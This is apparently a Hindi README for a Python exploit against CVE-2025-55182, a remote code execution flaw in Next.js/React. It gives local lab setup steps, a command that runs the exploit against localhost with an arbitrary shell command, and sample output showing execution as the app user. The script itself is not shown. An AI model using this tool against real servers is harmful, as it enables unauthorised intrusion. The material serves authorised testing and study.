
# CVE-2025-55182 के लिए Python एक्सप्लॉइट Next.js/React में सर्वर-साइड JavaScript इंजेक्शन, जो दूषित multipart फॉर्म डेटा के माध्यम से रिमोट कोड निष्पादन सक्षम करता है। अधिकृत परीक्षण के लिए लैब सेटअप शामिल है।
Python 3 स्क्रिप्ट जिसका उपयोग CVE-2025-55182 को प्रदर्शित करने के लिए किया जा सकता है। यह Next.js/React अनुप्रयोगों में सर्वर-साइड JavaScript इंजेक्शन भेद्यता का फायदा उठाती है, जो दूषित मल्टीपार्ट फ़ॉर्म डेटा के माध्यम से रिमोट कोड निष्पादन की अनुमति देती है।
⚠️ केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए।
npx [email protected] sample-app --yes
cd sample app
npm run build
npm run start
pip install requests
python3 exploit_cve_2025_55182.py -u http://localhost:3000 -c "id"
-u प्रोटोकॉल के साथ लक्ष्य डोमेन या IP - http://localhost:3000 -c सर्वर पर निष्पादित करने के लिए कमांड - id
[+] Sending exploit to http://localhost:3000 with command: id
[+] Command Result:
uid=1000(app) gid=1000(app) groups=1000(app)